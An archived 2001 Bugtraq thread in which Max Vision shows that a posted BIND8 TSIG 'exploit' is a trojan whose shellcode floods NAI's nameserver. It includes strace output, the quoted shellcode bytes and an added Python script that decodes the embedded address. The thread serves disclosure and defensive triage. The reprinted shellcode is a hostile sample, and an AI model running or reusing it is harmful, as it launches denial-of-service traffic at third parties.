Re: That BIND8 "exploit" attacks NAI
daemon@ATHENA.MIT.EDU (Max Vision)
Thu Feb 1 13:33:42 2001
Message-Id: <5.0.2.1.2.20010131211836.02bd5218@127.0.0.01>
Date: Wed, 31 Jan 2001 21:33:53 -0800
Reply-To: Max Vision <vision@WHITEHATS.COM>
From: Max Vision <vision@WHITEHATS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Here is more detailed information about the "trojan" bind8 exploit posted
to Bugtraq.

When you run the alleged tsig exploit it actually manages to run the Linux
shellcode on the local system (in my environment I used a Redhat 6.2
install in VMware (local network only)).

The exploit forks, sends something to your actual target (appears to be a
*nonworking* remote exploit for bind) and in the child process floods
dns1.nai.com without mercy:

...
fork() = 614
[pid 612] getpid() = 612
[pid 612] socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) = 3
[pid 612] sendto(3,
"\2d\204\0\0\1\0\0\0\0\0\1\0\315\200\203\304\10=\4\0\30"..., 512, 0,
{sin_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("23.23.23.23")}}, 16) = 512
[pid 612] socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
[pid 612] connect(4, {sin_family=AF_INET, sin_port=htons(31338),
sin_addr=inet_addr("23.23.23.23")}}, 16 <unfinished ...>
[pid 614] time(NULL) = 981004491
[pid 614] socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) = 3
[pid 614] sendto(3,
"/sh\0\0\3537^j\21j\2j\2jf\215\5a\0\0\0\315\200\211\302"..., 1024, 0,
{sin_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("161.69.3.150")}}, 16) = 1024
[pid 614] sendto(3,
"/sh\0\0\3537^j\21j\2j\2jf\215\5a\0\0\0\315\200\211\302"..., 1024, 0,
{sin_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("161.69.3.150")}}, 16) = 1024
...
(lots more sendto()...)
This is how those flood packets look with tcpdump:

x.x.x.x.4691 > 161.69.3.150.53: 12147 updateMA [14174a] [235q] [27153n]
[27138au] (1024)

There's lots of them. This is bad depending on your like/dislike of NAI
and/or law enforcement.

Drop that code and step away from the Internet!

Max

>Date: Wed, 31 Jan 2001 20:57:54 -0800
>To: bugtraq@securityfocus.com
>From: Max Vision <vision@whitehats.com>
>Subject: That BIND8 "exploit" attacks NAI
>
>Hi,
>
>Please beware of running code such as this. It will do its best to
>attack NAI's nameserver. It's a typical, though well disguised, shellcode
>trick.
>Look in the Linux shellcode:
>\xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com
>
>More details after I have a better look...
>Max
>
>At 04:12 PM 1/31/2001 -0700, you wrote:
>> >From Anonymous <nobody@replay.com> Wed Jan 31 18:06:24 2001
>>Date: Thu, 31 Jan 2001 18:06:19 -0400
>>From: Anonymous <nobody@replay.com>
>>To: BUGTRAQ@SECURITYFOCUS.COM
>>Subject: Bind8 exploit
>>Message-ID: <C5119AD12E92D311928E009027DE4CCA554903@replay.com>
>>
>>
>>/*
>> * Implements TSIG buffer mismanagement overflow for incorrect signatures.
>> * That one was really nice bug!
>> * Thanks NAI for nice bug!
>> */
>>
>>/* zeroes in all shellcodes are allowed - we encode them anyway.. */
>>char linux_shellcode[] = /* modified Aleph1 linux shellcode to
>> * bind to tcp port 31338. hey aleph1
>> * :) */
>>"\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd"
>>"\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d"
>>"\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d"
>>"\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02"
>>"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
>>"\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02"
>>"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";
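The check Max describes above (spotting \xa1\x45\x03\x96 == 161.69.3.150 inside the shellcode bytes) can be done mechanically before anything is compiled or run. The following Python is an added example written for this archive page; it is not code from the post, from Max Vision, or from the anonymous exploit author. It parses the C string literal exactly as quoted, looks for the specific address the way the post did by eye, and goes one step further by walking the bytes for anything shaped like a Linux sockaddr_in (sin_family, network-order sin_port, sin_addr). The C-string parser, the AF_INET scan and the "drop zero port / 0.0.0.0" filter are my own assumptions about what is worth reporting, not something the page specifies. On these bytes the only surviving candidate decodes to 161.69.3.150 port 53, which matches the sendto() destination in the strace output above.

```python
r"""Added example: decode the network endpoint hard-coded in a posted shellcode.

Not code from the Bugtraq thread.  It automates the check in the post
(\xa1\x45\x03\x96 == 161.69.3.150) and generalises it with a sockaddr_in scan.
The parser and the heuristics below are assumptions of this example.
"""
import re
import socket
import struct
from typing import List, Tuple

AF_INET = 2  # sin_family value on Linux

# Bytes copied verbatim from the quoted "Bind8 exploit" post (linux_shellcode[]).
SHELLCODE_LITERAL = (
    r"\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd"
    r"\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d"
    r"\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d"
    r"\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02"
    r"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
    r"\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02"
    r"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0"
)


def c_string_to_bytes(lit: str) -> bytes:
    r"""Turn the body of a C string literal into bytes.

    Handles \xHH (up to two hex digits, enough for this style of shellcode),
    \ooo octal escapes such as \0, and literal characters.  Anything else is
    rejected rather than guessed at.  (Assumption: a real C lexer takes all
    following hex digits for \x; every \x escape here is followed by a non-hex
    character, so the two-digit limit is safe for this input.)
    """
    out = bytearray()
    i = 0
    while i < len(lit):
        ch = lit[i]
        if ch != "\\":
            out.append(ord(ch))
            i += 1
            continue
        if i + 1 >= len(lit):
            raise ValueError("dangling backslash at end of literal")
        nxt = lit[i + 1]
        if nxt == "x":
            m = re.match(r"[0-9a-fA-F]{1,2}", lit[i + 2:])
            if not m:
                raise ValueError(f"bad \\x escape at offset {i}")
            out.append(int(m.group(0), 16))
            i += 2 + len(m.group(0))
        elif nxt in "01234567":
            m = re.match(r"[0-7]{1,3}", lit[i + 1:])
            out.append(int(m.group(0), 8))
            i += 1 + len(m.group(0))
        else:
            raise ValueError(f"unsupported escape \\{nxt} at offset {i}")
    return bytes(out)


SHELLCODE = c_string_to_bytes(SHELLCODE_LITERAL)


def find_address(code: bytes, dotted_quad: str) -> List[int]:
    """Offsets at which one IPv4 address appears in network byte order.

    This is the check the post does by eye for 161.69.3.150.
    """
    needle = socket.inet_aton(dotted_quad)
    return [i for i in range(len(code) - 3) if code[i:i + 4] == needle]


def find_sockaddr_in(code: bytes) -> List[Tuple[int, str, int]]:
    """Scan for byte sequences shaped like a Linux sockaddr_in.

    Layout: sin_family (host order, 2 bytes), sin_port (network order,
    2 bytes), sin_addr (4 bytes).  Candidates with a zero port or 0.0.0.0 are
    dropped: in this shellcode those are the neighbouring little-endian
    integers passed to socket(), not an endpoint (heuristic, an assumption).
    """
    hits = []
    for off in range(len(code) - 7):
        family = struct.unpack_from("<H", code, off)[0]
        if family != AF_INET:
            continue
        port = struct.unpack_from(">H", code, off + 2)[0]
        addr = socket.inet_ntoa(code[off + 4:off + 8])
        if port == 0 or addr == "0.0.0.0":
            continue
        hits.append((off, addr, port))
    return hits


def printable_strings(code: bytes, min_len: int = 4) -> List[bytes]:
    """Runs of printable ASCII, the usual first look at unknown shellcode."""
    return re.findall(rb"[ -~]{%d,}" % min_len, code)


def report(code: bytes) -> str:
    lines = [f"{len(code)} bytes, strings: {printable_strings(code)}"]
    for off, addr, port in find_sockaddr_in(code):
        lines.append(f"sockaddr_in at offset {off}: {addr}:{port}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SHELLCODE))
```

The sockaddr scan is deliberately dumb: it does not disassemble anything, it only asks "where in this blob is a struct that a connect() or sendto() could point at". That is enough to turn "beware of running code such as this" into a five-second triage step, and it works the same way on any other pasted x86 Linux shellcode that carries its endpoint as inline data.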